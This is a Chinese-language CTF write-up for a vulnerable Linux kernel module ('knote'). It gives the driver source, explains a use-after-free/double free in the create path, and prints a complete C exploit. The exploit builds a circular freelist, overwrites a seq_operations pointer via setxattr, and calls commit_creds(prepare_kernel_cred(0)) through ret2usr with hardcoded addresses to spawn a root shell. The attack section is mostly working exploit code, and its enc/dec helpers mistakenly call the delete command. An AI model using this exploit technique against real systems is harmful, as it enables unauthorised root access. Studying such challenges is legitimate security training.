前言
最近打算刷一些内核利用的 CTF 的题目~~~
题目分析
- 内核版本:v5.8.3,但是没有开启cg隔离
- smap/smep/kpti/kaslr全关,可以- ret2usr,所以应该是比较老的题目了(:这里很奇怪的是就算设置- kaslr但是也无法开启
- 然后 CONFIG_SLAB_FREELIST_RANDOM和CONFIG_SLAB_FREELIST_HARDENED都没有开启(:这里利用工具查出来CONFIG_SLAB_FREELIST_RANDOM是开启的,但是调试可以知道其没有开启
题目给了源码:
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/uaccess.h>
#define DEVICE_NAME "knote"
#define CLASS_NAME "knote"
MODULE_AUTHOR("r4j");
MODULE_DESCRIPTION("Secure your secrets in the kernelspace");
MODULE_LICENSE("GPL");
static DEFINE_MUTEX(knote_ioctl_lock);
static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg);
static int major;
static struct class *knote_class  = NULL;
static struct device *knote_device = NULL;
static struct file_operations knote_fops = {
    .unlocked_ioctl = knote_ioctl
};
struct knote {
    char *data;
    size_t len;
    void (*encrypt_func)(char *, size_t);
    void (*decrypt_func)(char *, size_t);
};
struct knote_user {
    unsigned long idx;
    char * data;
    size_t len;
};
enum knote_ioctl_cmd {
    KNOTE_CREATE = 0x1337,
    KNOTE_DELETE = 0x1338,
    KNOTE_READ = 0x1339,
    KNOTE_ENCRYPT = 0x133a,
    KNOTE_DECRYPT = 0x133b
};
struct knote *knotes[10];
void knote_encrypt(char * data, size_t len) {
    int i;
    for(i = 0; i < len; ++i)
        data[i] ^= 0xaa;
}
void knote_decrypt(char *data, size_t len) {
    knote_encrypt(data, len);
}
static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    mutex_lock(&knote_ioctl_lock);
    struct knote_user ku;
    if(copy_from_user(&ku, (void *)arg, sizeof(struct knote_user)))
        return -EFAULT;
    switch(cmd) {
        case KNOTE_CREATE:
			// len [0, 0x20]
			// idx [0, 0x10)
            if(ku.len > 0x20 || ku.idx >= 10)
                return -EINVAL;
            char *data = kmalloc(ku.len, GFP_KERNEL);
            knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
            if(data == NULL || knotes[ku.idx] == NULL) {
                mutex_unlock(&knote_ioctl_lock);
                return -ENOMEM;
            }
            knotes[ku.idx]->data = data;
            knotes[ku.idx]->len = ku.len;
            if(copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) {
                kfree(knotes[ku.idx]->data);
                kfree(knotes[ku.idx]); // 没有清空 knotes[ku.idx]
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            knotes[ku.idx]->encrypt_func = knote_encrypt;
            knotes[ku.idx]->decrypt_func = knote_decrypt;
            break;
        case KNOTE_DELETE:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            kfree(knotes[ku.idx]->data);
            kfree(knotes[ku.idx]);
            knotes[ku.idx] = NULL;
            break;
        case KNOTE_READ:
            if(ku.idx >= 10 || !knotes[ku.idx] || ku.len > knotes[ku.idx]->len) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            if(copy_to_user(ku.data, knotes[ku.idx]->data, ku.len)) {
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            break;
        case KNOTE_ENCRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
         case KNOTE_DECRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            knotes[ku.idx]->decrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
        default:
            mutex_unlock(&knote_ioctl_lock);
            return -EINVAL;
    }
    mutex_unlock(&knote_ioctl_lock);
    return 0;
}
static int __init init_knote(void) {
    major = register_chrdev(0, DEVICE_NAME, &knote_fops);
    if(major < 0)
        return -1;
    knote_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(knote_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }
    knote_device = device_create(knote_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
    if (IS_ERR(knote_device))
    {
        class_destroy(knote_class);
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }
    return 0;
}
static void __exit exit_knote(void)
{
    device_destroy(knote_class, MKDEV(major, 0));
    class_unregister(knote_class);
    class_destroy(knote_class);
    unregister_chrdev(major, DEVICE_NAME);
}
module_init(init_knote);
module_exit(exit_knote);
题目实现了一个菜单堆,具体增删查的功能,然后还有两个加解密功能,堆块大小限制为 [0, 0x20],然后最多同时创建 10 个 note,维护的结构体如下:
 
 主要的漏洞点在于在创建 note 时,如果赋值用户态数据失败则释放掉已经分配的堆块,但是这里没有将 knotes[ku.idx] 置 NULL,从而导致 UAF/Double Free
漏洞利用
这里没有给写的功能,所以得想办法写入,然后这里先假设有 smap/smep/kaslr/pti 等保护应该如何利用(:其实这里存在 0x20 大小的 double free,所以可以利用之前笔者总结的 DCO 方式进行利用,这里不过多说明,具体参考笔者之前的文章
然后笔者最开始想的是利用 user_key_payload + setxattr 实现越界读,但是似乎 add_key 用不了(:应该没编译相关模块
然后回到题目中保护全关的情况下,注意题目中 note 结构体的大小也是 0x20,所以构造循环 freelist:
- 先分配一个 note 0,data大小也为0x20,这里使得复制数据失败,从而释放相关堆块(:这里调试可以知道next指针存放在0x10位置
  
- 然后在释放 note0,此时构成循环freelist
  
- 此时分配 seq_operations占据堆块
  
- 然后在利用 setxattr修改seq_operations的start指针从而实现ret2usr
exp 如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <sys/xattr.h>
void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(2);
    exit(EXIT_FAILURE);
}
void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}
void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}
/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(2);
        exit(EXIT_FAILURE);
    }
    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");
    system("/bin/sh");
    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}
/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}
/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
struct knote {
    unsigned long idx;
    char * buf;
    size_t len;
};
enum knote_ioctl_cmd {
    KNOTE_CREATE = 0x1337,
    KNOTE_DELETE = 0x1338,
    KNOTE_READ = 0x1339,
    KNOTE_ENCRYPT = 0x133a,
    KNOTE_DECRYPT = 0x133b
};
int fd;
void add(uint64_t idx, void* buf, size_t len) {
        struct knote n = { .idx = idx, .buf = buf, .len = len };
        ioctl(fd, KNOTE_CREATE, &n);
}
void del(size_t idx) {
        struct knote n = { .idx = idx };
        ioctl(fd, KNOTE_DELETE, &n);
}
void show(size_t idx, void* buf, size_t len) {
        struct knote n = { .idx = idx, .buf = buf, .len = len };
        ioctl(fd, KNOTE_READ, &n);
}
void enc(size_t idx) {
        struct knote n = { .idx = idx };
        ioctl(fd, KNOTE_DELETE, &n);
}
void dec(size_t idx) {
        struct knote n = { .idx = idx };
        ioctl(fd, KNOTE_DELETE, &n);
}
static size_t prepare_kernel_cred = 0xffffffff81053c50;
static size_t commit_creds = 0xffffffff81053a30;
static size_t shell = (size_t)get_root_shell;
void get_root_privilige()
{
        asm volatile (
        "mov rdi, 0;"
        "mov r14, prepare_kernel_cred;"
        "call r14;"
        "mov rdi, rax;"
        "mov r14, commit_creds;"
        "call r14;"
        "swapgs;"
        "mov r14, user_ss;"
        "push r14;"
        "mov r14, user_sp;"
        "push r14;"
        "mov r14, user_rflags;"
        "push r14;"
        "mov r14, user_cs;"
        "push r14;"
        "mov r14, shell;"
        "push r14;"
        "iretq;"
        );
}
int main(int argc, char** argv, char** envp)
{
        bind_core(0);
        save_status();
        int res;
        int seq_fd;
        int key_id;
        int fds[20];
        char buf[0x20];
        memset(buf, 'A', sizeof(buf));
        fd = open("/dev/knote", O_RDONLY);
        if (fd < 0) err_exit("open /dev/knote");
        for (int i = 0; i < 20; i++) {
                fds[i] = open("/proc/self/stat", O_RDONLY);
        }
        add(0, (void*)0xdeadbeef, 0x20);
        del(0);
        seq_fd = open("/proc/self/stat", O_RDONLY);
        if (seq_fd < 0) err_exit("open seq file");
        open("/proc/self/stat", O_RDONLY);
        size_t evil[4] = { (size_t)get_root_privilige, 0xffffffff810f1800, 0xffffffff810f17f0, 0xffffffff811082e0 };
        setxattr("./", "Pwner", evil, 0x20, 0);
        for (int i = 0; i < 20; i++) {
                close(fds[i]);
        }
        read(seq_fd, buf, 1);
        return 0;
}
效果如下:
 
 题目如果开启了 smap/smep 可以考虑打 pt_regs 。然后这里还可以通过劫持 encrypt_func/decrypt_func 指针去控制程序执行流。



















